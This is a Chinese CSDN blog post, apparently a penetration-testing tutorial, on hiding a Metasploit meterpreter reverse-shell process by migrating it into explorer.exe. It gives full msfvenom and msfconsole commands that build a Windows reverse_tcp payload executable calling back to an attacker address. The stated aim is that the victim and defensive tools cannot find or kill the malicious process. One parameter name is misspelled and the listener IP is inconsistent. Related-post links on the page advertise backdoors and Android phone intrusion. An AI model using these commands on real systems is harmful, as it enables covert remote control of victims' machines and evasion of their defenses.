Metasploit渗透——msfvenom隐藏恶意进程

最新推荐文章于 2023-05-05 11:13:45 发布
最新推荐文章于 2023-05-05 11:13:45 发布
阅读量728 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120313686
版权

我们上传了msf马后并不是万无一失的,msf马创建的进程极有可能被防御设备发现,发出警报并采取措施终止进程,我们的会话也会被终止。因此,我们有必要将创建的msf马进程迁移到目标及正在运行的进程中,这样受害者就无法找到恶意进程,从而定位到恶意软件的位置了。

第一种方法

通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > shell.exe

在这里插入图片描述

加载msfconsole的exploit/multi/handler进行监听
在这里插入图片描述

使用如下命令查找shell.exe

ps | grep shell.exe

在这里插入图片描述

查找到shell.exe的进程是3660,直接杀死此进程

kill 3660

在这里插入图片描述

杀掉进程3660后,可以发现,我们的meterpreter会话并没有关闭,原因是因为PrependMigrate将我们的shell.exe隐藏在了explorer.exe中

第二种方法

使用Msfconsole创建可隐藏的二进制执行文件

use windows/meterpreter/reverse_tcp
set lhost 102.168.0.109
set lport 4444
set prependmigrate true
set prependmigrateprocess explorer.exe
generate -f exe -o shell2.exe

使用以上命令可以创建和msfvenom相同的文件,后续利用和第一种方法相同。

Thgilil
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2849
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
利用metasploit渗透测试制作隐藏后门
wr456wr的博客
03-12 691
利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门 使用ms17-010永恒之蓝漏洞对win7进行渗透 已知win7ip:192.168.47.129 使用nmap对其进行开放端口探测 在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞 [+] 192.168.47.129:445 - Host is likely VULNERABLE t
metasploit的模块构成及功能分析
xysoul的专栏
04-07 1万+
metasploit的模块构成及功能分析 今天我们介绍一下metasploit的基础架构和 市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。 exploit@ubuntu:/pentest/f
MSF&CobaltStrik流量隐藏
qq_45434762的博客
12-05 1287
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
远控免杀专题2---msfvenom隐藏参数
qq_41683305的博客
03-09 720
0x01 msfvenom简介 msfvenommsfpayload和msfencode的结合体,与2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framwork下面的msfpayload(载荷生成器),msfencoder(编码器),msfcli(监听接口)都不在被支持 0x02 常规参数 输入msfvenom可以查看所以的指令 -p,-p...
使用msfvenom生成木马用于监听别人的操作
Unitue_逆流
03-20 1万+
msfvenom Options: -p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n,
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
成功渗透后,Metasploit提供了一系列后渗透工具,如Meterpreter,它是一个功能强大的远程控制外壳,支持多种操作,如文件操作、进程控制、键盘记录等。这些工具可以帮助测试者进一步探索目标系统,收集敏感信息,...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
Metasploit渗透测试指南完整版-pdf
07-23
软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解...
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4663
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
远控免杀专题文章(2)-msfvenom隐藏的参数
mingyqf的博客
12-05 724
脉搏文库 TideSec 本专题文章导航 1、远控免杀专题文章(1)-基础篇:https://www.secpulse.com/archives/123295.html 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些小技巧。 本节目录如下: msfvenom简介 msfvenommsfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-fram
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4463
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
MSF编码+VS编译木马免杀
向阳-Y.的博客
03-16 2351
木马免杀
Meterpreter
abg49988的博客
12-17 678
监听 AutoRunScrip:自动执行脚本 如:自动执行post/windows/manage/migrate set AutoRunScript post/windows/manage/migrate set autorunscript migrate -f #获取shell后,将自动迁移到另一个进程 自动注入进程 set prependmigrate tru...
[转载]msfvenom隐藏的参数
gclome的博客
03-14 631
原文链接:https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247484720&idx=1&sn=2772684974b506ee81f7e8def15a37ed&chksm=ce5e2751f929ae479018f5d150007a5a6f9e95a92d63ce27c12e07d02e48c790ba...
Pentest with metasploit - overview.pdf
最新发布
10-06
在这个过程中,Metasploit Framework是一个不可或缺的工具,特别对于专业渗透测试人员和初学者而言。本文档由Joas Antonio dos Santos编写,旨在提供一个全面的指南,帮助用户了解和利用Metasploit进行安全测试。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值